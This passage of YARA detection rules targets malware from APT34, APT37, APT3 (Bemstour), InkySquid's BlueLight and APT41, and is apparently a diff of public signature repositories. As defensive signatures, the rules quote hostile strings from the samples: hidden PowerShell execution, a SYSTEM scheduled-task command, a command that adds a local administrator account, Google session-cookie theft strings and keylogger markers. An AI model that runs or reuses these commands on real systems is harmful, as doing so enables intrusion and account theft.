$s2 = "<body onload=\"test()\">" fullword ascii
condition:
filesize < 60KB and ( 1 of ($x*) or all of ($s*) )
}
rule APT34_Malware_Exeruner {
meta:
description = "Detects APT 34 malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
date = "2017-12-07"
hash1 = "c75c85acf0e0092d688a605778425ba4cb2a57878925eee3dc0f4dd8d636a27a"
id = "8ddfa59d-9b8a-5cb6-a992-6498ac9be75d"
strings:
$x1 = "\\obj\\Debug\\exeruner.pdb" ascii
$x2 = "\"wscript.shell`\")`nShell0.run" wide
$x3 = "powershell.exe -exec bypass -enc \" + ${global:$http_ag} +" wide
$x4 = "/c powershell -exec bypass -window hidden -nologo -command " fullword wide
$x5 = "\\UpdateTasks\\JavaUpdatesTasksHosts\\" wide
$x6 = "schtasks /create /F /ru SYSTEM /sc minute /mo 1 /tn" wide
$x7 = "UpdateChecker.ps1 & ping 127.0.0.1" wide
$s8 = "exeruner.exe" fullword wide
$s9 = "${global:$address1} = $env:ProgramData + \"\\Windows\\Microsoft\\java\";" fullword wide
$s10 = "C:\\ProgramData\\Windows\\Microsoft\\java" fullword wide
$s11 = "function runByVBS" fullword wide
$s12 = "$84e31856-683b-41c0-81dd-a02d8b795026" fullword ascii
$s13 = "${global:$dns_ag} = \"aQBmACAAKAAoAEcAZQB0AC0AVwBtAGk" wide
condition:
uint16(0) == 0x5a4d and filesize < 100KB and 1 of them
}

View file

@ -0,0 +1,17 @@
rule APT_NK_Methodology_Artificial_UserAgent_IE_Win7 {
meta:
author = "Steve Miller aka @stvemillertime"
description = "Detects hard-coded User-Agent string that has been present in several APT37 malware families."
hash1 = "e63efbf8624a531bb435b7446dbbfc25"
score = 45
id = "a747c908-7af7-5c29-8386-a71db7648061"
strings:
$a1 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
$a2 = {4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 3b 20 57 4f 57 36 34 3b 20 54 72 69 64 65 6e 74 2f 37 2e 30 3b 20 72 76 3a 31 31 2e 30 29 20 6c 69 6b 65 20 47 65 63 6b 6f 00 00 00 00}
$fp1 = "Esumsoft" wide
$fp2 = "Acunetix" wide ascii
$fp3 = "TASER SYNC" ascii
condition:
uint16(0) == 0x5A4D and all of ($a*) and not 1 of ($fp*)
}

View file

@ -0,0 +1,144 @@
/*
Copyright 2021 by Volexity, Inc.
The 2-Clause BSD License
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
rule APT_MAL_Win_BlueLight_B : InkySquid
{
meta:
author = "threatintel@volexity.com"
description = "North Korean origin malware which uses a custom Google App for c2 communications."
date = "2021-06-21"
hash1 = "837eaf7b736583497afb8bbdb527f70577901eff04cc69d807983b233524bfed"
license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
reference = "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
id = "3ec2d44c-4c08-514d-a839-acef3f53f7dc"
strings:
$magic = "host_name: %ls, cookie_name: %s, cookie: %s, CT: %llu, ET: %llu, value: %s, path: %ls, secu: %d, http: %d, last: %llu, has: %d"
$f1 = "%ls.INTEG.RAW" wide
$f2 = "edb.chk" ascii
$f3 = "edb.log" ascii
$f4 = "edbres00001.jrs" ascii
$f5 = "edbres00002.jrs" ascii
$f6 = "edbtmp.log" ascii
$f7 = "cheV01.dat" ascii
$chrome1 = "Failed to get chrome cookie"
$chrome2 = "mail.google.com, cookie_name: OSID"
$chrome3 = ".google.com, cookie_name: SID,"
$chrome4 = ".google.com, cookie_name: __Secure-3PSID,"
$chrome5 = "Failed to get Edge cookie"
$chrome6 = "google.com, cookie_name: SID,"
$chrome7 = "google.com, cookie_name: __Secure-3PSID,"
$chrome8 = "Failed to get New Edge cookie"
$chrome9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
$chrome10 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
$chrome11 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
$chrome12 = "https://mail.google.com"
$chrome13 = "result.html"
$chrome14 = "GM_ACTION_TOKEN"
$chrome15 = "GM_ID_KEY="
$chrome16 = "/mail/u/0/?ik=%s&at=%s&view=up&act=prefs"
$chrome17 = "p_bx_ie=1"
$chrome18 = "myaccount.google.com, cookie_name: OSID"
$chrome19 = "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3"
$chrome20 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
$chrome21 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
$chrome22 = "https://myaccount.google.com"
$chrome23 = "result.html"
$chrome24 = "myaccount.google.com"
$chrome25 = "/_/AccountSettingsUi/data/batchexecute"
$chrome26 = "f.req=%5B%5B%5B%22BqLdsd%22%2C%22%5Btrue%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at="
$chrome27 = "response.html"
$msg1 = "https_status is %s"
$msg2 = "Success to find GM_ACTION_TOKEN and GM_ID_KEY"
$msg3 = "Failed to find GM_ACTION_TOKEN and GM_ID_KEY"
$msg4 = "Failed HttpSendRequest to mail.google.com"
$msg5 = "Success to enable imap"
$msg6 = "Failed to enable imap"
$msg7 = "Success to find SNlM0e"
$msg8 = "Failed to find SNlM0e"
$msg9 = "Failed HttpSendRequest to myaccount.google.com"
$msg10 = "Success to enable thunder access"
$msg11 = "Failed to enable thunder access"
$keylogger_component1 = "[TAB]"
$keylogger_component2 = "[RETURN]"
$keylogger_component3 = "PAUSE"
$keylogger_component4 = "[ESC]"
$keylogger_component5 = "[PAGE UP]"
$keylogger_component6 = "[PAGE DOWN]"
$keylogger_component7 = "[END]"
$keylogger_component8 = "[HOME]"
$keylogger_component9 = "[ARROW LEFT]"
$keylogger_component10 = "[ARROW UP]"
$keylogger_component11 = "[ARROW RIGHT]"
$keylogger_component12 = "[ARROW DOWN]"
$keylogger_component13 = "[INS]"
$keylogger_component14 = "[DEL]"
$keylogger_component15 = "[WIN]"
$keylogger_component16 = "[NUM *]"
$keylogger_component17 = "[NUM +]"
$keylogger_component18 = "[NUM ,]"
$keylogger_component19 = "[NUM -]"
$keylogger_component20 = "[NUM .]"
$keylogger_component21 = "NUM /]"
$keylogger_component22 = "[NUMLOCK]"
$keylogger_component23 = "[SCROLLLOCK]"
$keylogger_component24 = "Time: "
$keylogger_component25 = "Window: "
$keylogger_component26 = "CAPSLOCK+"
$keylogger_component27 = "SHIFT+"
$keylogger_component28 = "CTRL+"
$keylogger_component29 = "ALT+"
condition:
$magic or
(
all of ($f*) and
5 of ($keylogger_component*)
) or
24 of ($chrome*) or
4 of ($msg*) or
27 of ($keylogger_component*)
}
rule APT_MAL_Win_BlueLight : InkySquid {
meta:
author = "threatintel@volexity.com"
date = "2021-04-23"
description = "The BLUELIGHT malware family. Leverages Microsoft OneDrive for network communications."
hash1 = "7c40019c1d4cef2ffdd1dd8f388aaba537440b1bffee41789c900122d075a86d"
hash2 = "94b71ee0861cc7cfbbae53ad2e411a76f296fd5684edf6b25ebe79bf6a2a600a"
license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
reference = "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
id = "3ec2d44c-4c08-514d-a839-acef3f53f7dc"
strings:
$pdb1 = "\\Development\\BACKDOOR\\ncov\\"
$pdb2 = "Release\\bluelight.pdb"
$msg0 = "https://ipinfo.io" fullword
$msg1 = "country" fullword
$msg5 = "\"UserName\":\"" fullword
$msg7 = "\"ComName\":\"" fullword
$msg8 = "\"OS\":\"" fullword
$msg9 = "\"OnlineIP\":\"" fullword
$msg10 = "\"LocalIP\":\"" fullword
$msg11 = "\"Time\":\"" fullword
$msg12 = "\"Compiled\":\"" fullword
$msg13 = "\"Process Level\":\"" fullword
$msg14 = "\"AntiVirus\":\"" fullword
$msg15 = "\"VM\":\"" fullword
condition:
any of ($pdb*) or
all of ($msg*)
}

View file

@ -0,0 +1,275 @@
rule apt3_bemstour_strings
{
meta:
description = "Detects strings used by the Bemstour exploitation tool"
author = "Mark Lechtik"
company = "Check Point Software Technologies LTD."
date = "2019-06-25"
sha256 = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
uuid = "8b76e10a-040f-505e-9dff-cd0a689b121e"
strings:
$dbg_print_1 = "leaked address is 0x%llx" ascii wide
$dbg_print_2 = "========== %s ==========" ascii wide
$dbg_print_3 = "detailVersion:%d" ascii wide
$dbg_print_4 = "create pipe twice failed" ascii wide
$dbg_print_5 = "WSAStartup function failed with error: %d" ascii wide
$dbg_print_6 = "can't open input file." ascii wide
$dbg_print_7 = "Allocate Buffer Failed." ascii wide
$dbg_print_8 = "Connect to target failed." ascii wide
$dbg_print_9 = "connect successful." ascii wide
$dbg_print_10 = "not supported Platform" ascii wide
$dbg_print_11 = "Wait several seconds." ascii wide
$dbg_print_12 = "not set where to write ListEntry ." ascii wide
$dbg_print_13 = "backdoor not installed." ascii wide
$dbg_print_14 = "REConnect to target failed." ascii wide
$dbg_print_15 = "Construct TreeConnectAndX Request Failed." ascii wide
$dbg_print_16 = "Construct NTCreateAndXRequest Failed." ascii wide
$dbg_print_17 = "Construct Trans2 Failed." ascii wide
$dbg_print_18 = "Construct ConsWXR Failed." ascii wide
$dbg_print_19 = "Construct ConsTransSecondary Failed." ascii wide
$dbg_print_20 = "if you don't want to input password , use server2003 version.." ascii wide
$cmdline_1 = "Command format %s TargetIp domainname username password 2" ascii wide
$cmdline_2 = "Command format %s TargetIp domainname username password 1" ascii wide
$cmdline_3 = "cmd.exe /c net user test test /add && cmd.exe /c net localgroup administrators test /add" ascii wide
$cmdline_4 = "hello.exe \"C:\\WINDOWS\\DEBUG\\test.exe\"" ascii wide
$cmdline_5 = "parameter not right" ascii wide
$smb_param_1 = "browser" ascii wide
$smb_param_2 = "spoolss" ascii wide
$smb_param_3 = "srvsvc" ascii wide
$smb_param_4 = "\\PIPE\\LANMAN" ascii wide
$smb_param_5 = "Werttys for Workgroups 3.1a" ascii wide
$smb_param_6 = "PC NETWORK PROGRAM 1.0" ascii wide
$smb_param_7 = "LANMAN1.0" ascii wide
$smb_param_8 = "LM1.2X002" ascii wide
$smb_param_9 = "LANMAN2.1" ascii wide
$smb_param_10 = "NT LM 0.12" ascii wide
$smb_param_12 = "WORKGROUP" ascii wide
$smb_param_13 = "Windows Server 2003 3790 Service Pack 2" ascii wide
$smb_param_14 = "Windows Server 2003 5.2" ascii wide
$smb_param_15 = "Windows 2002 Service Pack 2 2600" ascii wide
$smb_param_16 = "Windows 2002 5.1" ascii wide
$smb_param_17 = "PC NETWORK PROGRAM 1.0" ascii wide
$smb_param_18 = "Windows 2002 5.1" ascii wide
$smb_param_19 = "Windows for Workgroups 3.1a" ascii wide
$unique_str_1 = "WIN-NGJ7GKNROVS"
$unique_str_2 = "XD-A31C2E0087B2"
condition:
uint16(0) == 0x5a4d and (5 of ($dbg_print*) or 2 of ($cmdline*) or 1 of ($unique_str*)) and 3 of ($smb_param*)
}
rule apt3_bemstour_implant_byte_patch
{
meta:
description = "Detects an implant used by Bemstour exploitation tool (APT3)"
author = "Mark Lechtik"
company = "Check Point Software Technologies LTD."
date = "2019-06-25"
sha256 = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
/*
0x41b7e1L C745B8558BEC83 mov dword ptr [ebp - 0x48], 0x83ec8b55
0x41b7e8L C745BCEC745356 mov dword ptr [ebp - 0x44], 0x565374ec
0x41b7efL C745C08B750833 mov dword ptr [ebp - 0x40], 0x3308758b
0x41b7f6L C745C4C957C745 mov dword ptr [ebp - 0x3c], 0x45c757c9
0x41b7fdL C745C88C4C6F61 mov dword ptr [ebp - 0x38], 0x616f4c8c
*/
uuid = "c30434c3-8949-566c-b6a6-29bffdaf961d"
strings:
$chunk_1 = {
C7 45 ?? 55 8B EC 83
C7 45 ?? EC 74 53 56
C7 45 ?? 8B 75 08 33
C7 45 ?? C9 57 C7 45
C7 45 ?? 8C 4C 6F 61
}
condition:
any of them
}
rule apt3_bemstour_implant_command_stack_variable
{
meta:
description = "Detecs an implant used by Bemstour exploitation tool (APT3)"
author = "Mark Lechtik"
company = "Check Point Software Technologies LTD."
date = "2019-06-25"
sha256 = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
uuid = "c773da5a-2d3f-5a0a-af2e-28ad382622b3"
strings:
/*
0x41ba18L C78534FFFFFF636D642E mov dword ptr [ebp - 0xcc], 0x2e646d63
0x41ba22L C78538FFFFFF65786520 mov dword ptr [ebp - 0xc8], 0x20657865
0x41ba2cL C7853CFFFFFF2F632063 mov dword ptr [ebp - 0xc4], 0x6320632f
0x41ba36L C78540FFFFFF6F707920 mov dword ptr [ebp - 0xc0], 0x2079706f
0x41ba40L C78544FFFFFF2577696E mov dword ptr [ebp - 0xbc], 0x6e697725
0x41ba4aL C78548FFFFFF64697225 mov dword ptr [ebp - 0xb8], 0x25726964
0x41ba54L C7854CFFFFFF5C737973 mov dword ptr [ebp - 0xb4], 0x7379735c
0x41ba5eL C78550FFFFFF74656D33 mov dword ptr [ebp - 0xb0], 0x336d6574
0x41ba68L C78554FFFFFF325C636D mov dword ptr [ebp - 0xac], 0x6d635c32
0x41ba72L C78558FFFFFF642E6578 mov dword ptr [ebp - 0xa8], 0x78652e64
0x41ba7cL C7855CFFFFFF65202577 mov dword ptr [ebp - 0xa4], 0x77252065
0x41ba86L C78560FFFFFF696E6469 mov dword ptr [ebp - 0xa0], 0x69646e69
0x41ba90L C78564FFFFFF72255C73 mov dword ptr [ebp - 0x9c], 0x735c2572
0x41ba9aL C78568FFFFFF79737465 mov dword ptr [ebp - 0x98], 0x65747379
0x41baa4L C7856CFFFFFF6D33325C mov dword ptr [ebp - 0x94], 0x5c32336d
0x41baaeL C78570FFFFFF73657468 mov dword ptr [ebp - 0x90], 0x68746573
0x41bab8L C78574FFFFFF632E6578 mov dword ptr [ebp - 0x8c], 0x78652e63
0x41bac2L C78578FFFFFF65202F79 mov dword ptr [ebp - 0x88], 0x792f2065
0x41baccL 83A57CFFFFFF00 and dword ptr [ebp - 0x84], 0
*/
$chunk_1 = {
C7 85 ?? ?? ?? ?? 63 6D 64 2E
C7 85 ?? ?? ?? ?? 65 78 65 20
C7 85 ?? ?? ?? ?? 2F 63 20 63
C7 85 ?? ?? ?? ?? 6F 70 79 20
C7 85 ?? ?? ?? ?? 25 77 69 6E
C7 85 ?? ?? ?? ?? 64 69 72 25
C7 85 ?? ?? ?? ?? 5C 73 79 73
C7 85 ?? ?? ?? ?? 74 65 6D 33
C7 85 ?? ?? ?? ?? 32 5C 63 6D
C7 85 ?? ?? ?? ?? 64 2E 65 78
C7 85 ?? ?? ?? ?? 65 20 25 77
C7 85 ?? ?? ?? ?? 69 6E 64 69
C7 85 ?? ?? ?? ?? 72 25 5C 73
C7 85 ?? ?? ?? ?? 79 73 74 65
C7 85 ?? ?? ?? ?? 6D 33 32 5C
C7 85 ?? ?? ?? ?? 73 65 74 68
C7 85 ?? ?? ?? ?? 63 2E 65 78
C7 85 ?? ?? ?? ?? 65 20 2F 79
83 A5 ?? ?? ?? ?? 00
}
/*
0x41baeeL C785D8FEFFFF636D6420 mov dword ptr [ebp - 0x128], 0x20646d63
0x41baf8L C785DCFEFFFF2F632022 mov dword ptr [ebp - 0x124], 0x2220632f
0x41bb02L C785E0FEFFFF6E657420 mov dword ptr [ebp - 0x120], 0x2074656e
0x41bb0cL C785E4FEFFFF75736572 mov dword ptr [ebp - 0x11c], 0x72657375
0x41bb16L C785E8FEFFFF20636573 mov dword ptr [ebp - 0x118], 0x73656320
0x41bb20L C785ECFEFFFF73757070 mov dword ptr [ebp - 0x114], 0x70707573
0x41bb2aL C785F0FEFFFF6F727420 mov dword ptr [ebp - 0x110], 0x2074726f
0x41bb34L C785F4FEFFFF3171617A mov dword ptr [ebp - 0x10c], 0x7a617131
0x41bb3eL C785F8FEFFFF23454443 mov dword ptr [ebp - 0x108], 0x43444523
0x41bb48L C785FCFEFFFF202F6164 mov dword ptr [ebp - 0x104], 0x64612f20
0x41bb52L C78500FFFFFF64202626 mov dword ptr [ebp - 0x100], 0x26262064
0x41bb5cL C78504FFFFFF206E6574 mov dword ptr [ebp - 0xfc], 0x74656e20
0x41bb66L C78508FFFFFF206C6F63 mov dword ptr [ebp - 0xf8], 0x636f6c20
0x41bb70L C7850CFFFFFF616C6772 mov dword ptr [ebp - 0xf4], 0x72676c61
0x41bb7aL C78510FFFFFF6F757020 mov dword ptr [ebp - 0xf0], 0x2070756f
0x41bb84L C78514FFFFFF61646D69 mov dword ptr [ebp - 0xec], 0x696d6461
0x41bb8eL C78518FFFFFF6E697374 mov dword ptr [ebp - 0xe8], 0x7473696e
0x41bb98L C7851CFFFFFF7261746F mov dword ptr [ebp - 0xe4], 0x6f746172
0x41bba2L C78520FFFFFF72732063 mov dword ptr [ebp - 0xe0], 0x63207372
0x41bbacL C78524FFFFFF65737375 mov dword ptr [ebp - 0xdc], 0x75737365
0x41bbb6L C78528FFFFFF70706F72 mov dword ptr [ebp - 0xd8], 0x726f7070
0x41bbc0L C7852CFFFFFF74202F61 mov dword ptr [ebp - 0xd4], 0x612f2074
0x41bbcaL C78530FFFFFF64642200 mov dword ptr [ebp - 0xd0], 0x226464
0x41bbd4L 6A5C push 0x5c
*/
$chunk_2 = {
C7 85 ?? ?? ?? ?? 63 6D 64 20
C7 85 ?? ?? ?? ?? 2F 63 20 22
C7 85 ?? ?? ?? ?? 6E 65 74 20
C7 85 ?? ?? ?? ?? 75 73 65 72
C7 85 ?? ?? ?? ?? 20 63 65 73
C7 85 ?? ?? ?? ?? 73 75 70 70
C7 85 ?? ?? ?? ?? 6F 72 74 20
C7 85 ?? ?? ?? ?? 31 71 61 7A
C7 85 ?? ?? ?? ?? 23 45 44 43
C7 85 ?? ?? ?? ?? 20 2F 61 64
C7 85 ?? ?? ?? ?? 64 20 26 26
C7 85 ?? ?? ?? ?? 20 6E 65 74
C7 85 ?? ?? ?? ?? 20 6C 6F 63
C7 85 ?? ?? ?? ?? 61 6C 67 72
C7 85 ?? ?? ?? ?? 6F 75 70 20
C7 85 ?? ?? ?? ?? 61 64 6D 69
C7 85 ?? ?? ?? ?? 6E 69 73 74
C7 85 ?? ?? ?? ?? 72 61 74 6F
C7 85 ?? ?? ?? ?? 72 73 20 63
C7 85 ?? ?? ?? ?? 65 73 73 75
C7 85 ?? ?? ?? ?? 70 70 6F 72
C7 85 ?? ?? ?? ?? 74 20 2F 61
C7 85 ?? ?? ?? ?? 64 64 22 00
6A 5C
}
/*
0x41be22L C745D057696E45 mov dword ptr [ebp - 0x30], 0x456e6957
0x41be29L C745D478656300 mov dword ptr [ebp - 0x2c], 0x636578
0x41be30L C7459C47657450 mov dword ptr [ebp - 0x64], 0x50746547
0x41be37L C745A0726F6341 mov dword ptr [ebp - 0x60], 0x41636f72
0x41be3eL C745A464647265 mov dword ptr [ebp - 0x5c], 0x65726464
0x41be45L C745A873730000 mov dword ptr [ebp - 0x58], 0x7373
0x41be4cL C745C443726561 mov dword ptr [ebp - 0x3c], 0x61657243
0x41be53L C745C874654669 mov dword ptr [ebp - 0x38], 0x69466574
0x41be5aL C745CC6C654100 mov dword ptr [ebp - 0x34], 0x41656c
0x41be61L C745B857726974 mov dword ptr [ebp - 0x48], 0x74697257
0x41be68L C745BC6546696C mov dword ptr [ebp - 0x44], 0x6c694665
0x41be6fL C745C065000000 mov dword ptr [ebp - 0x40], 0x65
0x41be76L C745AC436C6F73 mov dword ptr [ebp - 0x54], 0x736f6c43
0x41be7dL C745B06548616E mov dword ptr [ebp - 0x50], 0x6e614865
0x41be84L C745B4646C6500 mov dword ptr [ebp - 0x4c], 0x656c64
0x41be8bL 894DE8 mov dword ptr [ebp - 0x18], ecx
*/
$chunk_3 = {
C7 45 ?? 57 69 6E 45
C7 45 ?? 78 65 63 00
C7 45 ?? 47 65 74 50
C7 45 ?? 72 6F 63 41
C7 45 ?? 64 64 72 65
C7 45 ?? 73 73 00 00
C7 45 ?? 43 72 65 61
C7 45 ?? 74 65 46 69
C7 45 ?? 6C 65 41 00
C7 45 ?? 57 72 69 74
C7 45 ?? 65 46 69 6C
C7 45 ?? 65 00 00 00
C7 45 ?? 43 6C 6F 73
C7 45 ?? 65 48 61 6E
C7 45 ?? 64 6C 65 00
89 4D ??
}
condition:
any of them
}

267
yara-Neo23x0/apt_apt41.yar Normal file
View file

@ -0,0 +1,267 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2019-08-07
Identifier: APT41
Reference: https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html
License: https://creativecommons.org/licenses/by-nc/4.0/
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule APT_APT41_POISONPLUG_3 {
meta:
description = "Detects APT41 malware POISONPLUG"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
date = "2019-08-07"
score = 80
hash1 = "70c03ce5c80aca2d35a5555b0532eedede24d4cc6bdb32a2c8f7e630bba5f26e"
id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
strings:
$s1 = "Rundll32.exe \"%s\", DisPlay 64" fullword ascii
$s2 = "tcpview.exe" fullword ascii
$s3 = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" fullword ascii /* reversed goodware string 'Software\\Microsoft\\Windows\\CurrentVersion\\Run' */
$s4 = "AxEeulaVteSgeR" fullword ascii /* reversed goodware string 'RegSetValueExA' */
$s5 = "%04d-%02d-%02d_%02d-%02d-%02d.dmp" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 900KB and 3 of them
}
rule APT_APT41_POISONPLUG_SHADOW {
meta:
description = "Detects APT41 malware POISONPLUG SHADOW"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
date = "2019-08-07"
score = 85
hash1 = "462a02a8094e833fd456baf0a6d4e18bb7dab1a9f74d5f163a8334921a4ffde8"
id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
condition:
uint16(0) == 0x5a4d and filesize < 500KB and pe.imphash() == "c67de089f2009b21715744762fc484e8"
}
rule APT_APT41_CRACKSHOT {
meta:
description = "Detects APT41 malware CRACKSHOT"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
date = "2019-08-07"
score = 85
hash1 = "993d14d00b1463519fea78ca65d8529663f487cd76b67b3fd35440bcdf7a8e31"
id = "4ec34a77-dc7f-5f27-9f0a-c98438389018"
strings:
$x1 = ";procmon64.exe;netmon.exe;tcpview.exe;MiniSniffer.exe;smsniff.exe" ascii
$s1 = "RunUrlBinInMem" fullword ascii
$s2 = "DownRunUrlFile" fullword ascii
$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36" fullword ascii
$s4 = "%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 250KB and ( 1 of ($x*) or 2 of them )
}
rule APT_APT41_POISONPLUG_2 {
meta:
description = "Detects APT41 malware POISONPLUG"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
date = "2019-08-07"
score = 70
hash1 = "0055dfaccc952c99b1171ce431a02abfce5c6f8fb5dc39e4019b624a7d03bfcb"
id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
strings:
$s1 = "ma_lockdown_service.dll" fullword wide
$s2 = "acbde.dll" fullword ascii
$s3 = "MA lockdown Service" fullword wide
$s4 = "McAfee Agent" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 11000KB and all of them
}
rule APT_APT41_POISONPLUG {
meta:
description = "Detects APT41 malware POISONPLUG"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
date = "2019-08-07"
score = 80
hash1 = "2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd"
hash2 = "5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90"
hash3 = "f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661"
hash4 = "3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f"
id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
strings:
$s1 = "TSMSISrv.DLL" fullword wide
$s2 = "[-]write failed[%d]" fullword ascii
$s3 = "[-]load failed" fullword ascii
$s4 = "Remote Desktop Services" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 10000KB and (
pe.imphash() == "1b074ef7a1c0888ef31337c8ad2f2e0a" or
2 of them
)
}
rule APT_APT41_HIGHNOON {
meta:
description = "Detects APT41 malware HIGHNOON"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
date = "2019-08-07"
score = 85
hash1 = "63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7"
hash2 = "4aa6970cac04ace4a930de67d4c18106cf4004ba66670cfcdaa77a4c4821a213"
id = "6611fb04-7237-52d1-b29f-941c3853aeca"
strings:
$x1 = "workdll64.dll" fullword ascii
$s1 = "\\Fonts\\Error.log" ascii
$s2 = "[%d/%d/%d/%d:%d:%d]" fullword ascii
$s3 = "work_end" fullword ascii
$s4 = "work_start" fullword ascii
$s5 = "\\svchost.exe" ascii
$s6 = "LoadAppInit_DLLs" fullword ascii
$s7 = "netsvcs" fullword ascii
$s8 = "HookAPIs ...PID %d " fullword ascii
$s9 = "SOFTWARE\\Microsoft\\HTMLHelp" fullword ascii
$s0 = "DllMain_mem" fullword ascii
$s10 = "%s\\NtKlRes.dat" fullword ascii
$s11 = "Global\\%s-%d" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) or 4 of them )
}
rule APT_APT41_HIGHNOON_2 {
meta:
description = "Detects APT41 malware HIGHNOON"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
date = "2019-08-07"
hash1 = "79190925bd1c3fae65b0d11db40ac8e61fb9326ccfed9b7e09084b891089602d"
id = "1e48d859-2da9-583e-80e5-8d59054cfb85"
strings:
$x1 = "H:\\RBDoor\\" ascii
$s1 = "PlusDll.dll" fullword ascii
$s2 = "ShutDownEvent.dll" fullword ascii
$s3 = "\\svchost.exe" ascii
condition:
uint16(0) == 0x5a4d and filesize < 600KB and (
pe.imphash() == "b70358b00dd0138566ac940d0da26a03" or
pe.exports("DllMain_mem") or
$x1 or 3 of them
)
}
rule APT_APT41_HIGHNOON_BIN {
meta:
description = "Detects APT41 malware HIGHNOON.BIN"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
date = "2019-08-07"
score = 90
hash1 = "490c3e4af829e85751a44d21b25de1781cfe4961afdef6bb5759d9451f530994"
hash2 = "79190925bd1c3fae65b0d11db40ac8e61fb9326ccfed9b7e09084b891089602d"
id = "c8bd62b4-b882-5c04-aace-76dd4a21a784"
strings:
$s1 = "PlusDll.dll" fullword ascii
$s2 = "\\Device\\PORTLESS_DeviceName" wide
$s3 = "%s%s\\Security" fullword ascii
$s4 = "%s\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii
$s5 = "%s%s\\Enum" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 600KB and (
pe.imphash() == "b70358b00dd0138566ac940d0da26a03" or
3 of them
)
}
